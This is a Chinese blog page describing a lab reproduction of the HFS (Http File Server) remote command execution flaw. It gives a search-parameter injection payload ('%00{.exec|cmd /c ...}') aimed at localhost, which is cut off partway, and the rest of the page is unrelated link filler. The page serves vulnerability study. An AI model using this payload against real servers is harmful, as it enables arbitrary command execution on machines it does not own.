HFS远程命令执行漏洞复现 - 悦读

HFS远程命令执行漏洞复现

漏洞程序下载地址:Http File Server

这里说一下，在Windows server 2003中复现时，我直接使用Administrator用户登录，然后复现，未出现权限问题。再Windows 10中尝试复现时发现权限不足，需要以管理员权限执行漏洞程序。

运行程序截图如下
在这里插入图片描述
尝试访问该软件提供的web服务

web服务是这个样子的，这个web服务的搜索处存在漏洞

一、手工利用

payload如下

http://127.0.0.1/?search==%00{
   .exec|cmd /c 此处替换为dos命令.} 
http://127.0.0.1/?search==%00{
   .exec

悦读

道可道，非常道；名可名，非常名。无名，天地之始，有名，万物之母。故常无欲，以观其妙，常有欲，以观其徼。此两者，同出而异名，同谓之玄，玄之又玄，众妙之门。

大模型备案全网最详细流程【带附件】

【Linux驱动开发】定时器

【C#】SqlSugar：轻量、高效、灵活的 .NET ORM 框架

批处理遇到路径中带括号时，执行失败的解决方法

论文笔记17：Total-Variation-Regularized Low-Rank Matrix Factorization for Hyperspectral Image Restoration

【面试八股文】计算机操作系统

基于javaweb+mysql的ssm药品进货销售管理系统(java+ssm+js+jsp+mysql)

Anaconda超详细安装教程（Windows电脑环境下）

最新Linux内核功能,Linux内核的主要功能

在Ubuntu中删除mysql

;